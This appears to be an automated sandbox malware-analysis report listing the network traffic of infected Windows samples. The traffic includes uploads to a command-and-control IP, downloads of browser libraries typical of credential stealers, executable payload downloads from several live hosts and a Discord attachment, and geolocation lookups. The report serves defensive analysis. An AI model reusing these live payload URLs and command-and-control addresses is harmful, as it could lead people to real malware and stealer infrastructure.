Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJKEHCAKFBFHJKEHCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.adttemp.com.br
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJEBKJEGHJKECAAKJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFHJKJJJECGDHJJDHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 104621Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJECFCGHIDGHIDHDHIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kpyjjvqdiemoiebl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lelfqipvajp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jncoidythmtum.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ecmpkonsxath.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qhahtsyildlx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gdvgvnpnsfha.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hexeftuymxc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vtxhrpouhnlhicef.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cmovmgvridjjk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uopmqrlryhqym.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kdrrcifvupv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://froejfbfqcabvk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ijjaoopskaipyfot.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qlrqehiwqptv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jkukpjjesbti.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mxmwgpprwcpwxem.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bglvkirrchdcy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://syppprqoaeoyrm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://syrimjyxlgxo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://doewnlgtcbtsgiu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uetjtbokcendpi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://obuibmhfpgvomgod.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ukrvqlmerplrex.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tldcvhhvnmxh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ncehelngswfsf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://amrbjqbtgpnr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lejcpsbnxtuxdtx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://trlgbchacigdlq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://irythjvgtsstcpv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nwelovrvoirfrsd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xvkfgvcftmyct.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jpkolefxkmrqfjw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /wek.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.253.69
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://duxgasiuxdjh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /feswad.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.154.13.143
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dejiweyxqsl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jyqccrxyqqnpjdg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: trad-einmyus.com
Source: global traffic	HTTP traffic detected: GET /lend/jfesawdr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.233.132.167
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://thhfncmsprqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: trad-einmyus.com

Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.59

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 10_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

10_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /klok.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.safeautomationbd.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.adttemp.com.br
Source: global traffic	HTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /wek.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.253.69
Source: global traffic	HTTP traffic detected: GET /feswad.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.154.13.143
Source: global traffic	HTTP traffic detected: GET /lend/jfesawdr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.233.132.167

Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: E609.exe, 0000000F.00000003.2126413455.0000000009840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: E609.exe, 0000000F.00000003.2126992854.0000000009840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: E609.exe, 0000000F.00000003.2127702492.0000000009840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: trad-einmyus.com
Source: global traffic	DNS traffic detected: DNS query: sdfjhuz.com
Source: global traffic	DNS traffic detected: DNS query: api.2ip.ua
Source: global traffic	DNS traffic detected: DNS query: cajgtus.com
Source: global traffic	DNS traffic detected: DNS query: www.safeautomationbd.com
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: nessotechbd.com
Source: global traffic	DNS traffic detected: DNS query: transfer.adttemp.com.br
Source: global traffic	DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: unknown

